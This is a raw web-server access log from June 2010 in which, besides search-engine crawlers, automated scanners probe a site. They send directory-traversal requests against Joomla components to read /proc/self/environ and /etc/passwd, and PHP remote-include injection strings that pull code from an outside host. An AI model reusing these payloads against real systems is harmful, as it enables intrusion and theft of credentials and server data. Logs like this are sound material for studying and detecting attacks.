75.136.121.230 - - [10/Jun/2010:03:17:01 -0500] "GET /logs/access_log.1263081600//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
75.136.121.230 - - [10/Jun/2010:03:17:06 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
88.191.94.188 - - [10/Jun/2010:03:19:20 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
88.191.94.188 - - [10/Jun/2010:03:19:20 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.191.94.188 - - [10/Jun/2010:03:19:21 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
88.191.94.188 - - [10/Jun/2010:03:19:21 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
212.241.179.30 - - [10/Jun/2010:03:19:45 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
212.241.179.30 - - [10/Jun/2010:03:19:46 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
212.241.179.30 - - [10/Jun/2010:03:19:55 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
212.241.179.30 - - [10/Jun/2010:03:19:56 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
67.195.112.180 - - [10/Jun/2010:03:22:26 -0500] "GET /logs/access_log.1217203200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
75.136.121.230 - - [10/Jun/2010:03:22:27 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
67.195.112.180 - - [10/Jun/2010:03:22:28 -0500] "GET /logs/access_log.1214092800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
75.136.121.230 - - [10/Jun/2010:03:22:28 -0500] "GET /logs/access_log.1272153600//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
75.136.121.230 - - [10/Jun/2010:03:22:28 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
75.136.121.230 - - [10/Jun/2010:03:23:17 -0500] "GET /logs/access_log.1272153600//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
75.136.121.230 - - [10/Jun/2010:03:23:17 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
75.136.121.230 - - [10/Jun/2010:03:23:17 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
74.54.107.136 - - [10/Jun/2010:03:23:24 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
74.54.107.136 - - [10/Jun/2010:03:23:24 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
216.65.69.227 - - [10/Jun/2010:03:23:52 -0500] "GET /logs//index2.php?option=com_reporter&Itemid=1&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""libwww-perl/5.834"
216.65.69.227 - - [10/Jun/2010:03:23:52 -0500] "GET //index2.php?option=com_reporter&Itemid=1&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
84.38.67.248 - - [10/Jun/2010:03:23:57 -0500] "GET /logs/index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
84.38.67.248 - - [10/Jun/2010:03:23:58 -0500] "GET /index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
95.156.233.139 - - [10/Jun/2010:03:25:07 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
95.156.233.139 - - [10/Jun/2010:03:25:07 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
95.156.233.139 - - [10/Jun/2010:03:25:07 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
95.156.233.139 - - [10/Jun/2010:03:25:07 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
88.191.94.188 - - [10/Jun/2010:03:25:24 -0500] "GET /logs/index2.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
88.191.94.188 - - [10/Jun/2010:03:25:24 -0500] "GET /logs/index2.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
88.191.94.188 - - [10/Jun/2010:03:25:24 -0500] "GET /index2.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
88.191.94.188 - - [10/Jun/2010:03:25:24 -0500] "GET /index2.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.54.107.136 - - [10/Jun/2010:03:26:05 -0500] "GET /logs/access_log.1274832000//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
74.54.107.136 - - [10/Jun/2010:03:26:05 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.54.107.136 - - [10/Jun/2010:03:26:05 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
94.23.49.196 - - [10/Jun/2010:03:28:46 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.49.196 - - [10/Jun/2010:03:28:46 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.49.196 - - [10/Jun/2010:03:29:02 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.49.196 - - [10/Jun/2010:03:29:02 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
81.21.79.214 - - [10/Jun/2010:03:30:24 -0500] "GET /logs/?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8947 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
81.21.79.214 - - [10/Jun/2010:03:30:25 -0500] "GET /?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.51.33.26 - - [10/Jun/2010:03:33:38 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
72.51.33.26 - - [10/Jun/2010:03:33:39 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
72.51.33.26 - - [10/Jun/2010:03:34:42 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
72.51.33.26 - - [10/Jun/2010:03:34:45 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
72.51.33.26 - - [10/Jun/2010:03:34:46 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.227.215.115 - - [10/Jun/2010:03:35:23 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.832"
216.227.215.115 - - [10/Jun/2010:03:35:24 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
72.51.33.26 - - [10/Jun/2010:03:36:24 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
72.51.33.26 - - [10/Jun/2010:03:36:24 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.227.215.115 - - [10/Jun/2010:03:36:32 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
72.51.33.26 - - [10/Jun/2010:03:36:37 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
72.51.33.26 - - [10/Jun/2010:03:36:38 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
218.48.202.44 - - [10/Jun/2010:03:37:13 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
72.51.33.26 - - [10/Jun/2010:03:37:20 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
72.51.33.26 - - [10/Jun/2010:03:37:22 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
202.130.32.50 - - [10/Jun/2010:03:37:56 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
202.130.32.50 - - [10/Jun/2010:03:37:57 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
202.130.32.50 - - [10/Jun/2010:03:38:18 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
216.227.215.115 - - [10/Jun/2010:03:38:28 -0500] "GET /logs/access_log.1274572800/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.832"
216.227.215.115 - - [10/Jun/2010:03:38:28 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
216.227.215.115 - - [10/Jun/2010:03:38:28 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:03:38:36 -0500] "GET /logs/access_log.1274572800/*.php?option=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:03:38:37 -0500] "GET /*.php?option=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:03:38:37 -0500] "GET /logs/*.php?option=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
216.227.215.115 - - [10/Jun/2010:03:38:37 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.832"
72.51.33.26 - - [10/Jun/2010:03:39:22 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
72.51.33.26 - - [10/Jun/2010:03:39:23 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
72.51.33.26 - - [10/Jun/2010:03:39:28 -0500] "GET /logs/access_log.1273017600/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
72.51.33.26 - - [10/Jun/2010:03:39:29 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
72.51.33.26 - - [10/Jun/2010:03:39:30 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
218.48.202.44 - - [10/Jun/2010:03:39:52 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
218.48.202.44 - - [10/Jun/2010:03:39:53 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
218.48.202.44 - - [10/Jun/2010:03:39:53 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
218.48.202.44 - - [10/Jun/2010:03:39:54 -0500] "GET /logs/access_log.1274572800/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
81.21.79.214 - - [10/Jun/2010:03:40:04 -0500] "GET /logs/?option=com_juser&view=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8947 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
81.21.79.214 - - [10/Jun/2010:03:40:04 -0500] "GET /?option=com_juser&view=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.51.33.26 - - [10/Jun/2010:03:40:43 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
72.51.33.26 - - [10/Jun/2010:03:40:43 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
202.130.32.50 - - [10/Jun/2010:03:41:04 -0500] "GET /logs/access_log.1274572800/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
202.130.32.50 - - [10/Jun/2010:03:41:04 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
202.130.32.50 - - [10/Jun/2010:03:41:05 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
202.130.32.50 - - [10/Jun/2010:03:41:30 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
72.51.33.26 - - [10/Jun/2010:03:41:59 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
72.51.33.26 - - [10/Jun/2010:03:41:59 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
89.31.116.11 - - [10/Jun/2010:03:43:17 -0500] "GET /logs/access_log.1274572800/*.php?option=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:03:43:18 -0500] "GET /*.php?option=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:03:43:19 -0500] "GET /logs/*.php?option=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
72.51.33.26 - - [10/Jun/2010:03:45:08 -0500] "GET /logs/access_log.1273622400/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
66.249.71.144 - - [10/Jun/2010:03:47:12 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Googlebot-Image/1.0"
66.249.71.144 - - [10/Jun/2010:03:47:12 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 304 - "-""Googlebot-Image/1.0"
216.227.215.115 - - [10/Jun/2010:03:47:41 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.832"
216.227.215.115 - - [10/Jun/2010:03:47:42 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
216.227.215.115 - - [10/Jun/2010:03:48:10 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
72.51.33.26 - - [10/Jun/2010:03:49:00 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
72.51.33.26 - - [10/Jun/2010:03:49:02 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
218.48.202.44 - - [10/Jun/2010:03:49:12 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.195.112.180 - - [10/Jun/2010:03:49:28 -0500] "GET /logs/access_log.1246233600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
202.130.32.50 - - [10/Jun/2010:03:50:55 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
202.130.32.50 - - [10/Jun/2010:03:50:55 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
202.130.32.50 - - [10/Jun/2010:03:51:05 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
216.227.215.115 - - [10/Jun/2010:03:52:01 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.832"
216.227.215.115 - - [10/Jun/2010:03:52:02 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
216.227.215.115 - - [10/Jun/2010:03:52:02 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.832"
207.46.204.185 - - [10/Jun/2010:03:52:39 -0500] "GET /logs/access_log.1248912000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
